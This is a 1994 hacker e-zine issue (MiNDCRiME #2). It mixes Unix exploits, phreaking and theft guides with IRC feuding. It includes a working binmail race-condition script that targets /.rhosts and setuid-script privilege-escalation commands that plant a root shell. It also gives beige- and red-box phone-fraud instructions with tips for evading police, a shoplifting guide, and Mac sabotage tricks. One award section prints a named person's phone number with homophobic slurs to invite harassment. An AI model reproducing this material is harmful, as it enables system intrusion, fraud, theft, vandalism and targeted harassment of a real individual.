# # # # ###### ##### ###### # # ####### ## ## # ## # # # # # # # # ## ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ###### # # # # ##### # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # ###### ##### # # # # # ####### - - - - - ------ ----- - - - - - ------- - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ----- - - - - ----- - - - - - - - - - - - - - - - - - - - -- -- - -- - - - - - - - - -- -- - - - - - ------ ----- ----- - - ------- Issue #2 "Holy fux, Batman!" Dec 1, 1994 =================================[MiNDCRiME]================================== MiNDCRiME Magazine is protected under Copywright laws of the United States and Europe. No portion of this work may be duplicated without the expressed permission of the editor. MiNDCRiME Magazine may be distributed freely as long as the distributed copy is unaltered. Use of MiNDCRiME within any corporation whether private or government is subjected to a fee. E-Mail mndcrime@m-net.arbornet.org for information on commercial license. =================================[MiNDCRiME]================================== [Table Of Contents] File #1: b. Article submission information. c. About articles that appear in MiNDCRiME. d. EDiTORiAL: IRC thoughts by h0wcum. (continued) File #2: Sendmail: the latest exploit by zomo. File #3: Beginner's Guide to Hacking continues with setuid stuff from zomo. File #4: MiNDCRiME's Official Emmy Awards. File #5: eASE dROPPING aND cARDS by iP File #6: How to Mess up Department Store Macs By C-D and Walrus File #7: Phreaking, a Beginner's Guide by WyreTapp. File #8: Stealing Comic Books by kid Eternity File #9: Getting Even: the sequel your momma warned you about. b: Supplimental Toolz: Fake Mail + News File #10: News Flash: Hacker gets 20-month sentence. Courtesy Rerror. File #11: New sendmail hole? ================================[MiNDCRiME]================================ Introduction Welcome to iSSUE #2 of MiNDCRiME. Things are rolling now, we are a little late with this issue because some of our authors are late sending in their articles. The initial reaction to MiNDCRiME has been mixed. There are people who say it rox, and there are ppl who say it sux. Nevertheless, I have been highly sought after since publishing the first issue. MiNDCRiME is: h0wcum : editor Valgamon: assistant editor. (welcome aboard!) iP : global co-ordinator. oJ : Staff dude Digital : Staff dude So here is the second issue. I hope everyone gets a little something from it. Enjoy and don't get caught. ================================[MiNDCRiME]================================ Submission Information If you would like to submit an article, email the article as well as your handle to: mndcrime@cyberspace.net. All submissions are subjected to editing and rejection. We are currently looking for articles on: Easy systems, Hacker's sites, BBSs and FTP sites on the net. Unix hacking tutorials, src codes, bugs, shell scripts, etc. Recent information on Kevin Mitnick. Unix and general computer jokes. World hacking and phreaking news. Use your imagination. Direct all comments and questions to the address noted above. Direct all flames to /dev/null or my anus, whichever floats your boat. ==================================[MiNDCRiME]=============================== About Article Submission Some people have pulled me aside on IRC to tell me they thought certain submitted articles in issue #1 were lame. I'd just like to point out that the people who write for us put a bit of effort into their work and it isn't fair to shoot them down so quickly. I'd also like to add that if you hotshots think you can do better, you are *more* than welcome to submit an article. Remember, next time it could be you they are saying wrote a lame article. We try hard, Valgamon and I to put out the best magazine that we can. You can take your attitudes and put them where the sun don't shine. If you have some constructive criticism to offer, we will be happy to hear it, but if you want to cop an attitude with us, you can eat me. ================================[MiNDCRiME]=============================== Thoughts on IRC by h0wcum As you all know #hack is +i. I'd like to start off this message saying that I intend no disrespect to any of those who have chosen to make #hack invite only. This is merely my opinion, which is shared by many, even those who choose not to gripe openly about it. For quite some time #hack has had its doors open to all who wished to enter. That was the essence of the channel. The only time I have known #hack to be invite only is when the channel has been taken over, and it it appears now that it has been taken over for the final time, on a more permanent basis. No one person, or small group of people own #hack. No one has the right to make the channel invite only: it's like inviting or refusing quests to someone elses' house. You have no right to make #hack +i. It's *not* yours. The decision to make #hack +i was brought about by one individual and supported by others. It is, however, contested by many, some of which who are ops, who have tried to make #hack -i and ended up in a +i <--> -i war with len. Let's forget for a moment that you have absolutley *no fucking* right to make any permanent descisions on the channel. Let's forget that you have to be re-opped evertime you join #hack and that #hack does not automattically role out the red carpet and op you when you join. Let's examine, if you will, the inconvenience factor. I usually get invited to #hack, that is, when ops are awake. Getting into the channel at night or even at 8am is another story. Check it: <-[len]-> invite #hack *** len is away: ask mark ][ceman or loki or y or loq <-[mark]-> invite #hack *** Mark is away: Doing evil thigns to evil things <-[][ceman]-> invite #hack <-[y]-> invite #Hack *** y: No such nick/channel <-[loq]-> invite #hack *** loq is away: ZZzzzZZZ...msg len loki ragent gentry for invite <-[ragent]-> invite #hack *** ragent: No such nick/channel <-[gentry]-> invite #hack *** gentry: No such nick/channel <-[loki]-> inite #Hack .... or my personally favorite circular reference: <-[len]-> invite *** len is away: ask mark <-[mark]-> invite *** Mark is away: ask len As you can see, one has to fuck around for a time just to get an invite. You end up in a big circle of invite /msg's just to get into a channel that should be allowed in with no hassle. This is rediculous. I emplore those who are holding #hack hostage to take a fucking step back and realizee that you have exactly *squats* worth of authority to make it +i, especially when there are so many against it. len, you don't own #hack, I don't know who you are, but in all my time on #hack, I've just started to see you around in the last few months, unless you went by another nick. I don't wanna blow sunshine up anyone's ass, but I'd like to open this to a vote. If you are a non-op on #hack, send e-mail to our address and explain your position on this. Also, I am not trying to blow sunshine up anyone's ass, but this shit has got to end. ==================================[MiNDCRiME]=============================== =================================[MiNDCRiME]================================== [FiLE #2:] [Here's the latest binmail script. I don't know how many of you have it, but here it is. This is courtesy of zomo. ] From zomo@narqlinq.net23.com Sat Oct 8 10:28:21 1994 Date: Sat, 8 Oct 1994 10:01:48 -0500 From: zomo@narqlinq.net23.com #!/bin/sh # # This exploits a flaw in Ultrix/SunOS binmail(1), and attempts # to embarrass the admin, by creating an motd entry. # # Written 1994 by Nate Lawson # Minor Revisions by Chris Ellwood # Thanks go to 8lgm for the basic script format. PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" ME="`whoami`" PWENT="`hostname` `whoami`" cat > race.c << 'EOF' #define TARGET "/.rhosts" #include #include #include int main( ac,av) int ac; char **av; { unsigned int pid,bpid; /* Some machines don't have pid_t */ int i; char target[13]; strcpy (target,"/tmp/maa"); /* General format for binmail temp names */ if ((pid = fork())==0) { sleep (2); nice (19); /* Increase our chances and ... */ execl ("/bin/mail","mail",0); /* Fork binmail */ } bpid=pid; /* back up our pid for a later time */ for (i=11;i>=8;i--) { target[i]=(pid%10) + '0'; /* Make the name for the tempfile */ pid /= 10; } while (!symlink(TARGET,target)) unlink (target); /* Point that mktemp()'d file to the pot of gold */ while (symlink(TARGET,target)) unlink (target); /* Probably not necessary, but what the heck */ kill(bpid,1); /* Clean up, don't want to lag the system */ } EOF cc -O -s -o race race.c # Check we now have race if [ ! -x "race" ]; then echo "$PROG: couldnt compile race.c - lame!" exit 1 fi OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null NEW_TARGET_LEN=$OLD_TARGET_LEN cp /usr/spool/mail/$ME /tmp/$$ # Backup the mail spool.. we need it cp /dev/null /usr/spool/mail/$ME echo "" >> /usr/spool/mail/$ME echo $PWENT >> /usr/spool/mail/$ME echo "" >> /usr/spool/mail/$ME while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do ./race & RACE_PID=$! sleep 4 NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null kill -9 $RACE_PID done # We won the race echo "Succeeded.." # Add back our spool.. don't want to lose our mail. cp /dev/null /usr/spool/$ME cp /tmp/$$ /usr/spool/mail/$ME rm -f /tmp/$$ race race.c exit 0 =================================[MiNDCRiME]================================== =================================[MiNDCRiME]================================== [FiLE #3:] [I'd like to remind folks that this is the "Beginner's" section. Most of you will know this. I don't need to hear colorful remarks about how "old" this is. -hc] "Why shell scripts with the set-user-id bit set aren't safe?" by zomo Most shells will run as a login shell if the first character of their argv[0] starts with a '-'. This is how login manages to give you a login shell (check login.c). It calls csh as '-csh'. One of the things that a login shell does is read your .profile or .cshrc. On some systems, the shell is stupid enough to read and run $HOME/.profile (or equivalent) even if it is running set-uid (effective uid != real uid). So, % ls -l /usr/local/bin/setuid-shell-script -rwsr-xr-x 1 root 51763 Nov 16 1993 setuid-shell-script % cat > .profile << _EOF_ cp /bin/sh /tmp/fuck chown root.wheel /tmp/fuck chmod 4755 /tmp/fuck _EOF_ % ln -s /usr/local/bin/setuid-shell-script -gotcha % ./-gotcha % /tmp/fuck # You got it! And there is another easy-to-exploit bug with set-uid shell script. % ls -l /usr/local/bin/setuid-shell-script -rwsr-xr-x 1 root 51763 Nov 16 1993 setuid-shell-script % ln -s /usr/local/bin/setuid-shell-script -i % ./-i # Try it and think how it works (or it doesn't work ;) ). Now for the second security hole. It works on almost all #! systems. Not only with shell scripts. When the kernel execs a file, it looks for a magic number in the first two bytes ( try % man a.out ). If the magic number is '#!', then it takes the next one or two tokens, execs file into which token parsed, with the full pathname of the script as an argument. ( get the kernel source of BSD unix and check exec.c ) So if /user/crash/dummies starts with: #!/bin/sh then the kernel, in the process of loading this, would do: execute "/bin/sh /user/crash/dummies". In other words, /bin/sh would have /user/crash/dummies as argv[0]. If it was #!/bin/csh -f then the kernel would execs "/bin/csh -f /user/crash/dummies" The important thing to note here is that the shell re-opens the file fo itself. The kernel does not pass an open file descripter to shell. The race condition arises here. % ls -l /usr/local/bin/setuid-shell-script -rwsr-xr-x 1 root 51763 Nov 16 1993 setuid-shell-script % ln -s /usr/local/bin/setuid-shell-script hack-link % cat > hack-commands << _EOF_ cp /bin/sh /tmp/fuck chown root.wheel /tmp/fuck chmod 4755 /tmp/fuck _EOF_ % ./hack-link So the kernel stat()s hack-link. stat() follows the link and see the set-uid bit set with setuid-shell-script and the owner being root. So the kernel sets uid to root (check exec.c, you can find this routine). Then it executes the following command: /bin/sh /user/danny/hack-link with uid set to 0. The uid-zero shell opens /user/danny/hack-link. The open() follows the link and opens the file at the other end (/usr/local/bin/setuid-shell-script) and executes the commands from it. Still no security hole. But what if while the kernel was doing this, you did: % rm mylink; ln -s /user/danny/hack-commands /usr/danny/hack-link Now when the kernel followed hack-link, it found /usr/local/bin/setuid-shell-script. So it set uid to 0. But the time the /bin/sh follwed hack-link to open it, it find it was linked to hack-commands, not /usr/local/bin/setuid-shell-script. So it execute hack-commands as root. Now you will almost certainly not win such a race with the kernel. But you can increase the probability of win a race by increasing system load (i.e. execute X application, compute complex math problem) and doing race with fast and optimized C program. The moral of story: DO NOT SET-UID ANY SCRIPTS. ================================[MiNDCRiME]================================ [FiLE #4:] MiNDCRiME Presents: Asshole of the Month The Official Anus Emmy Presented to: blootin Runner's up: Solctice, heretic, b1tchez. [Pretty soon, Solctice will be like Whitney, snagging all the awards..] ================================[MiNDCRiME]================================ _____ _____ |_ _| Roses are red, |_ _| n (O O) n Violets are blue, n (O O) n H _|\_/|_ H You fuxed with me, j00 H _|\_/|_ H nHnn/ \___/ \nnHn So fux yew, times 2!! nHnn/ \___/ \nnHn \__\/| |\/__/ \__\/| |\/__/ ================================[MiNDCRiME]================================ MiNDCRiME Presents: Narq of the Year The Official Trust Me Not Emmy Presented to: Skipjack Runners up: pX (email me for his inpho) Hark! I am a narq! Of stark nature and poise, I lurch silently amongst the noise. Your info, haveth I Dick size, hair color and cbi Watch me, j00, I am a spy! When u fux up, you will hear, Skipjack narqed you out, sweet and dear. Fux with me not, For I shall narq, Destroy your family, will I do Just for fuxing with me on IRC, j00. ================================[MiNDCRiME]================================ MiNDCRiME Presents: Fag of the Century The Official Buttfuck.Com Emmy Presented To: Solctice Runners up: no one, he won by a long shot. I don't even know where to begin. Why don't you call him yourself: Jim Reinknecht (Solctice) 908-832-6633 [I know it's lame, but considering the numberous times he put my info up on irc... Merry Christmas, fucker.] ================================[MiNDCRiME]================================ ================================[MiNDCRiME]================================ [FiLE #5:] eASE dROPPING aND cARDS y---[MiNDCRiME #2!]---y aRTICLE tYPED bY iP?! _ _ _____ 12.o4.94 ]____ _ _ Every now and then, those of us who take the time to be observant stumble across something remarkable. Let me relate to you one of those experiences. It was an all too lazy sunny afternoon in Indiana. I was bored, and I decided to listen to my Realistic PRO-2004 scanner. I flipped it on and scanned through the usual federal government, military aviation, and cordless phone frequencies, but there was no action to be found. I happened to come across some scrambled DEA transmissions and a droning cordless phone conversation by some neighbors I could not identify. So for a change I decided to scan through the marine radio channels. The scanner then stopped on marine radio channel 26, which is used to ship-to-shore telephone calls. A man was reading off his calling card number to the operator, who gladly accepted and connected his call. Calling card numbers over the airwaves! I was shocked -- astonished that such a lack of security could not only exist, but be accepted practice. I began mointoring marine telephone to find out more, and it turns our that using a calling card for billing is commonplace on VHF marine radiotelephone. People use calling cards for billing all the time. That's what the are for. But is it that big of a deal? [k0d3z!] You bet it is. Marine telephone uses two frequencies, one for the ship and one for the shore station. [obviously] The shore station transmits both sides of the conversation at a some-what considerable power, enough to offer reliable communications up to 50 miles offshore. Anyone with a standard police type scanner costing as little as $100 can listen in. People using marine radiotelephonecan be broadcasting their calling card number to a potential audience of thousands. [k0d3z] And that just shouldn't be happening, but it is. [I won't complain] And there is no doubt that calling card fraud is occurring because of this lack of security. From the phone compant's [many Bell and non-Bell companies provide marine telephone service] point of view it must be a trade-off for customer convenience. You see, there just aren't that many ways to bill a ship-to-shore call. Most calls are collect, a few are billed to the ship if they have an account, and a few go to third party numbers [hehe] or other special accounts. .. Sometimes the operators have trouble verifying billing information. I monitored one man, who after racking-up $40 worth of AT&T charges was informed that they couldn't accept his international account number. The operator finally coaxed him into giving a address for billing. Calls are often billed to third party numbers with verification [hmm], but calling cards make billing easy for both the customer and the phone company involved. It would also be tricky for a company to not allow calling card use [very tricky]. Doing so would be a inconvenience to customers and would force them to admit a lack of communications security. Of course people using marine radio should already realize that their conversations aren't private, but announcing the fact wouldn't help the phone compant at all. In fact, people may place less calls. The convenience offered by calling cards makes them an easy target for fraud. They can be used by anyone from any phone and with a variety of different long distance carriers via 10XXX numbers. No red of blue box hardware necessary here, just 14 digits, but of course, the number won't be valid for long after all those strange charges start showing up on someone's bill. It should be noted that when a calling cafd is used, the number called, time and date of call, and location [and often, the number] from which the call was placed are printed on the bill. A fraudulent user could be caught via that information if they were careless. Also, some long distance companies may contact the owner of the card if they notice and unusually high number of charges on the card. .. Long distance companies bear with the brunt of the bills caused by calling card fraud. However, if you read the fine print, the cards offered by many companies have a certain minimum amount that the customer must pay, say $25 or $50. [I have yet heard of a case where a phone compant got away with charging a customer when the only thing stolen was a number and not the card itself] .. So, whats the moral of the story? Simple. Be damn careful what you say over any radio, and that included cordless and cellular telephones. Also, be careful about how sloppy you are when using cards. If you are using a calling card, enter it with touch tones. =) If you happen to make VHF marine radiotelephone calls, bill collect or charge to your phone number as you would to a third party number -- without the last four calling card digits. For the most part radio communications are easy to intercept, and keeping them secure is up to you. Then again, it gives hackers and phreakers the cutting edge, and I must say no one is in any situation to bitch or complain. ================================[MiNDCRiME]================================ [File #6:] [This is sortof an example of what NOT to send us. I posted this because the author was kind enough to send it and because it's kinda funny. In the future, folkx, please only send h/p related files. -hc] How to mess up department store Macs By C-D and Walrus Messing up department store Macs is a fun a wholesome activity that can be enjoyed by the whole family. Some of these might be to complicated to do in a store without people getting suspicious, but they are fun anyways. Here's some favorites! * Make a copy of the system folder, leave it next to the other system folder. This will screw up the system, and to boot you will need a system disk. * Make tons of copies of all the extensions in the extension folder. This makes the startup a very slow one, and could cause conflicts * Bring a modified system and finder from home. You should have edited it with ResEdit, for example make the "Are you sure you want to empty the trash?" dialog into something like "The gamma correction buffer on this monitor has failed, please step away from the monitor and seek help from a qualified technician". * Get a startup pict of a dialog box saying "Are you sure you wish to purge your ROM? This process is irreversible" and have the cancel button grayed out. A couple more you could try: * Switch the empty and bulging Trash icons, so that the trash looks empty when it contains files, and bulges when empties. * Edit the balloon Help text strings (most of the are in easy-to-access STR# resources so that pointing to a window's Close box produces a help balloon that says "click this box will cause irreparable damage to the motherboard" * Edit the MENU resource to turn a separator line in a menu into an alluring new menu command (like "Double Processing Speed") that doesn't work. * Use ResEdits MENU editor to change all text in menus to white, rendering the commands completely invisible. (they still work, you just can't see them) * Replace the standard alert box icon with the System Bomb icon. * Re-map the keyboard so that pressing any key produces a semi-colon. * Change the names of an applications menus, so that the File menu contain the Format commands and vice-versa * Install a desktop pattern consisting entirely of Trash can icons, and then hide the trash in the pattern. * Create a startup screen that features a realistic System bomb message, urging the user to restart the Mac immediately. * Switch the trash and hard drive icons, give them each others names. So much fun to watch them trash the whole hard drive. * To crak At-Ease, simply hit the programmers switch and type G FINDER . This will quit At-Ease and return you to the finder for your hours of wholesome fun. If you don't have a programmers button, you can also try command power which might or might not work. * If you really want to down the Mac, make some files in teach text (about3-5). Name them all .sony . Put one on the desktop, one in the first HD window, one in the System folder. If you have any left, sprinkle them gingerly through the System folder. Restart, and the Mac will attempt to use the files as Hard Drive Drivers. This can completely corrupt the hard drive, its tons of fun. * Unplug and plug back in the ADB cables, this makes all the ADB devices work very oddly. * Randomly unplug cables, and plug them back into other sockets. Its great to see the expressions on sales peoples faces. * Switch the keyboard type in the control panels, this will mess up everything you type. * Take an old disk and bend the metal sliding cover thing a bit out. Put the disk in, and then try to eject it, if it came out bend the metal more and put it in again. This works like an arrow or fishhook, it goes in but does not come out. * Push the restart button, and then repeatedly push the programmer button while the startup sound is playing, then leave the computer sitting with the sad Mac. * Remove the monitor cable just a bit, so that everything appears green, or red, or purple=8Apsychedelic! * Name the finder 'finderL' Restart and run away, watch as dumbfounded salespeople open the case to make sure the HD is really there. * Make all the icons that are root folders invisible , and name them with=spaces. Watch the clerks go nuts! If you want to get in touch with us, we are C-D and Walrus on IRC, have phun... :) ================================[MiNDCRiME]================================ ==== Phreaking, a Begginers Guide ==== By: WyreTapp ==== Nov 25th, 1994 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Disclaimer: Every phile needs on of these. :( I, Bud Wieser, and the contributors of this document are not responsible for any damages caused by the use of it. In no way do we condone or encourage (hehe) you, the reader, to put this information into practice. Intro. -=-=-=-=-= Lame ass right?? Well FUCK YOU! There have been tons of philes written on boxing, but I felt like writing one too. Its a good way to learn how to write, and you seem to remember everything quicker. So, im gonna share my experiences with you readers, so that you too may cope with the crude and harsh remarks from the city-boyz on the net. Have fun, and enjoy. All of this HAS BEEN DONE AND WORKS IN MY AREA. I will not include a bunch of theoretical BS that MAY work- only the real thing for the real peoplz. Whats phreaking?? -=-=-=-=-= Good question. Its the abuse of a phone system. It usually involves stealing from the phone company, or a person; resulting in lotsa phun. There are many branches of phreaking, with many sub-levels. You will probably find that you cannot do everything in your area. This is mainly because of new security features installed, and the wide-spread use of the Digital Switching System. You may want to phreak just for phun, or, you may want to hack some local place without getting caught. For whatever reason, it never hurts to know. :) Sounds phun- what do I do? -=-=-=-=-= This is REALLY easy. The first thing your going to want to do is build yourself a tool known as a BEIGE BOX. This is probably the MOST usefull tool around (the Red Box MIGHT be in your area). Before I go into any depth, I will tell you how to make one You need ---------- 1 piece of phone cord (with a plug on each end) A set of wire cutters 2 Alligator Clips (Of diffrent colors) Assembly ---------- 1) Grab phone cord in left hand. 2) Grab wire cutters in right hand. 3) Cut off the plug on one end of the phone cord. 4) Attach the alligator clips to the RED and GREEN wires. (May be BLUE and WHITE) 5) Pour beer on cat. There ya go, a Beige box. It should look something like this. >-. ________________________,---. ---> `====`------------------------;___| <--- Plug (Jack) Clips >-' ^Phone cord If you can't figure this out, stop reading, get a LONG peice of rope, make a noose, tie it too a friends car, stick your head in, and tell your friend to step on the gas. Now what- You got yourself this phone cord with alligator clips on one end. What will you do with it?? Read on. Get a phone. The best kind is a hand-set that requires no base. These are much eaiser to store, and can be connected/disconnected with great ease. Plug the JACK end of the Beige Box into the phone. You now have a linemans handset. Where to use. -=-=-=-=-= The next step is too find a place to use your new toy. Go outside and walk down the street. See those telephone poles? If you dont, then you got yourself an under-ground wire. These can be very difficult, or very easy. Look around for a man hole that has your telco's initials on it. The man-hole will be slightly bigger than the others around it. After you have found it read on too the "Canning" section. If you do see telephone poles, try following them. Remember that the lower wires are CABLE and TELEPHONE. The power lines SHOULD have an insulator (a piece of ceramic) holding them away from the pole, so you should be able to tell. Follow the lines until you see wires running off into someones house. Follow the line RIGHT into their yard. Check and see if it goes into their roof. If it does, then keep moving: If it goes down the side of their house you just found yourself a "spot". Most likely, you will find a Grey colored box, about 4"x4"x2". Locate it, and push UP on it, to slide it off. Once you get it off, it should look similar to this (it may have 4 prongs which means it has may have 2 linez) ,-------------------. | | | Bolts | | | | | __ <-'-> __ | | | | | | | | `--'--. ,--`--' | `--------|`'|-------' | | <-- Main wire. ` ` Attach the RED alligator clip (from the RED wire of the phone cord) onto the LEFT bolt, and the GREEN clip onto the RIGHT bolt. You SHOULD get a dial tone. If you dont, then reverse the clips. If the box has more than one set of bolts, attach the clips to the bolts that are on the same horizontal plane (Ie: Two top, or two bottom bolts not one top and one bottom) Confuse you yet??? You'll figure it out. It is likely that you will find one of these on a phone pole. If you do, get ready for some fun, because that is probably a test line owned by the phone company. You can make all the calls you want, and never have to worry about someone else picking up the line. Sometimes, on apartments, you will find a silver box about a foot long. There are SHINY METAL (Not grey plastic). You can open it by sliding it to the right. It will unlatch and spring open, revealing a staggered arangment of bolts, OR prongs. It will look something like this. ,------CASING-----------------. | | | __ | | | | | | ,---`--' <--- Bolts | | | __ | ____.' | | | Main Wire-> ____'-------------- `--' | | `. | | `.__ __ | \|/ | | \|/ These can be a little tricky, because most of the time all of the prongs arnt used, and the telco guys are lazy. Just keep trying combo's until you get a tone. You would think that you would just stagger your way down, BUT Ive only seen ONE that was done like that. :( They are found often near the top of telephone poles. It isnt really a good idea to go up there, because if someone catches you, you have no where to run. Even if you live in the sticks, SOME COP is gonna drive by and ask you what your doing (Trust me.. :( Green Cans -=-=-=-=-= After you get the hang of those (they are your LAST resort), keep following that phone line. Eventually, you SHOUD come to a place where that BIG line (on the phone poles) goes down into some pipes on the side of the pole and underground. THIS IS WHAT YOU ARE LOOKING FOR! Look around for another place like this CLOSE by. If you find it, somewhere around your area is a "Mother Load" or "Green Can". It may be underground. As mentioned before, look around for the man hole with the Telco's initials on it. The mother load is usually a grey-green in color, though I have seen grey ones. They look ALOT like swing-open filing cabinets. Now, get out your 7/16" wrench (Good thing you read the WHOLE text file before you went out) and twist the bolts on the silver hands counter-clockwise (There are arrows printed on the silver handle). Got it open? Awesome 'eh? (Yes, Im Canadian) All those wires, those white plastic bars, those wierd looking toolz hanging off the side of the doors, the instructions on how to use them... Yes, the instructions. Read them. Write down any phone numbers written down on the inside of the can. Look for a regular phone jack. They are USUALLY test lines. A source of worry-free amusement. If one exists, use it. Why bill someone some money when you can do it too your telco. If there is no phone jack your going to have to use one of the tools. Use the one on the left. It looks really fuqing wierd. Now randomly pick out a plastice bar, and open it. There should be tabs you press to have it flip open. You just opened a terminal. look at it terminal closely. You should be able to see bits of bare wire if you look at the slits on the top of it. When you find one that has the wire in it, plug in the test tool. There are two little spikes that fit into hole on the FRONT (not the top) of the terminal, and you can slide the latch of the tool of the face of the terminal and hook it onto the back. Attach your beige box two the bolts at the base of the tool. If you dont get a dial tone, swith the alligator clips. If still no tone, try another bank on the terminal. Before you go phreak-happy, GRAB THE WIRE. There should be a spool of wire somewhere in the can, usually resting in its own little stand. TAKE IT. It is VERY VERY usefull. General tips beige boxing. -=-=-=-=-= This is what I want to stress. How NOT to get caught. Here are a few rules you should follow: --------------------------------------- 1. Do everything suspicious late at night 2. Keep away from noisy dogs 3. Keep away from hot spots (lotsa cops) 4. Keep away from party zones 5. Keep quite You should be sure to wear a lighter colored shirt underneath a darker colored shit. That way, if you DO get seen, you can whip off the dark shit, and appear to be a diffrent person. Remember that spool of wire you got? Well, try running your connections away from civilization (across the road and down the ditch). I ran over 400 meters of wire into the woods once, and had no connection problems. Be sure to watch out for cutting the line, and shorts (if you must strip the wire in more than one spot) To make your life easier, try getting some heavey-duty clips with wires hanging from them and a clip on the other end. You can attach these to your connection, so you can clip on without opening anything up later, and disconnect without having to go back to the site (just yank). If you get stopped by the police (on a routine stop), try and be REALLY polite. Answer any questions the guy may have UNLESS it starts getting to the "I know Im caught" point. Lie about your name of course. If you are carrying a bag and he asks to see whats in it, SHOW him, but dont take anything out of the bag. Just open it so he can look in. If he says something like "Would you come with me?", say "Sure.." and when he turns around RUN!!! (A good reason NOT to drive directly to your site). Here is a little list of things you should get if your going to get into phreaking. WyreTapps List o' Stuff -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1. A friend. Its always funner if u got a friend with you. 2. Pliers, Wire cutters, 7/16" wrench, flash-light and a knife all attacked to a rope or something- so you dont have to dig for them. 3. A back-pack. 4. A spool of wire (the 300meter phone stuff from the can) 5. A spool of little wire (for loose connections and tying) 6. Extra alligator clips 7. 4 Industrial strength clips with wires attached (you will find a use.) 8. A hand-scanner (to scan the police channels. Its nice to know if you've been caught early.) 9. Walkie-Talkies. Nothing expensive. Just so you can communicate with your friend (ie: setting up a connection and a cop comes. Your friend is 200 meters away, and cant yell or you'll both get seen.) 10. A binder, with paper and a pen attached to it. Really nice to have. Red Boxing -=-=-=-=-= A red box is something that plays the quarter sound. Whenever you drop a quarter into a pay-phone, it makes a series of beeps which signals a quarter has been dropped in. (There are dime and nickle sounds 2) You can make this sound without the quarter. :) But, alas- Most telco's are smart and buy NEW payphones that have the ground check. When a coin is dropped into the phone, it grounds it so that the pay-phone knows you dropped money in. Before I tell you how to by-pass the ground test, heres how to make a red box, the EASY way. Get one of those halmark greeting cards, or talking pictures, or record-your-greeting christmas ornaments and record the tone into it. How do you get the tone?? HAHAHA. Remember your beige box? Look around the pay-phone for one of those little grey boxes or a phone-jack. Plug your beige box in, and drop a quarter into the pay phone. The tone will be played through your phone REALLY loud and clear. Just record this into your aparatus. Another way of doing the tone without a redbox, is to use your beige box as mentioned above, and put the ear-piece to the mouth-piece of another payphone. To bypass the ground check, just drop a nickle into the slot (which may sometimes be enough for local calls- no red-box needed), OR: Look at the mouth-piece. Alot of holes in it. Is there a hole in the direct middle?? If so, drive a tack into it, and run a piece of wire from the tack to the hook (the thing that holds the phone up when you hang it up). Hang-up the phone for about 2 seconds, and that will ground the phone so you can play your tones into your beige box, with a grounded phone. :) Sometime you can just ground the phone to make local calls, but Ive only seen one phone that'll do that (in an OLD dorm). Conclusion -=-=-=-=-= I was hopeing on writing some stuff on Calling Cards, how to setup a teleconfrence (just dial 0 and ask for help) and Voice Message systems but I think this article is long enough for now. I ny next article I will discuss the above and after that I will go into Unix Hacking. Greetz to: Z0rpHix, Tonyhawk, Endlisnis, Wildman, QwikSilver, Dark and jUIcE. ================================[MiNDCRiME]================================ [File #8:] [This is an example of what NOT to send. The article is nice, but it doesn't go with h/p. In the future please only send h/p related articles to us. Unless u have a really unusual how-to, send only h/p. -hc] ______________________________ |[][][][][][][][][][][][][][][]| |[] []| |[] /\ []| |[] \ []| |[] \TEALING COMIC BOOKS []| |[] \/ []| |[] []| |[][][][][][][][]][[][][][][][]| ================================ by: kid Eternity For those of you who collect comic books, you probably know that it can be an expensive hobby. For those of you who don't collect comic books, trust me. Even if you don't collect comics, this file may be of some use to you. Comic books, like basball cards, can be(come) very valuable; so you could acquire and sell comic books, or give them away to friends, relatives, etc. Also, to those of you who don't collect, I suggest you start- its damn fun. There are comics for everyone. ===- First, you'll need a place to steal comics from. This could be a local bookstore or a supermarket with a comic book stand. But, the Best place would be either a comic bookstore, or a comic book convention. In a place like a bookstore or a supermarket, you could hide the comic book(s) inside on another, in another book or magazine, or just take it. When I say 'just take it', i mean discretely, like hiding it or something. Stick it under you shirt/jacket, whatever. The best way is to roll the comic book (gently!!! if you bend it, it may not be worth shit!) a little, then stick your hand and forearm through it, then put your sleeve over that. That may seem a little complicated, but I've found it to be the best/most discreet way. Or you could always walk out of the store it. Many times people won't even think that you are stealing it. If they do, just say that you bought it somewhere else. If you are going to say that, you may want to bring along a bag from a comic bookstore plus make up a fake receipt on your home calculator(on that you can print up numbers and shit on), or you COULD do it with your computer/printer. If you bring along the bag, you'll probably get away with taking more stuff. STORES & CONVENTIONS Comic book stores and conventions are sometimes better to steal from because you can get older/more valuable/more rare comic books than at a bookstore or something. Choosing the store is very important. You want to find a store that is poorly run, somewhat spacious, and does not have any employees walking around watching you. At most of the larger comic book stores, they'll have a television with some sort of sci-fi movie playing, if you've seen the movie before, you're in luck. The employees are usually watching the movie. Listen to the employees talking to see if there is a part of the movie that they especially want to see. If that part isn't too far away, you'll want to make your purchase RIGHT before it comes on. It also works to your advantage if the employees are having a discussion If you are a veteran collector, and there is a particular store you hate, because of the owner being an asshole, Whatever, you'll probably want to hit this store. Once you have found the comics you want, you can try a few different things. If you didn't already know, in comic book stores, all back issues are stored in a plastic comic-sized bag with a thin piece of cardboard o the back (but inside the bag) to keep the comic book safe. One thing you can do is get some newer issues off the new issue rack-section-type- thing, then open up the comic bag, look through the comic book a little (as if you are deciding whether or not to purchase it) then, as you are putting the comic away, put a new issue or two inside the bag also. Remember to put these behind the back issue that was originally in the bag. Then look around a little longer, then casually go and buy your comic books. Another thing to try is somewhat easier, but requires more planning, and only works if you have some experience collecting. First of all, you'll need to find a comic book worth stealing. You don't HAVE to for this plan to work, it may even work better if its any old comic, but its just not worth it unless you find a comic worth stealing. I suggest a comic in the $20-$60 price range. Also, and this is the important part, make sure that it is either not very popular AT ALL, or that it has 2nd, 3d, etc printings that look exactly the same as the first printing. Next, go to the comic book store and find that comic book and check to see if they have 2nd or 3rd, etc, printings that are cheaper than the first printing. Remember how the price label looks (you may even want to take a piece of paper and copy it right there - say you're checking how much comic books are in a couple of places to compare prices or something), now go home and make that label again. The next day, go to the store and put that copy of the label that was on the later printings on the FIRST printing (right over its old label). Now the first printing looks like a later printing, and has the same price as a later printing. Now, just like before, wait til the employees are preoccupied, then make your purchase. You may want to buy some other comics at the same time 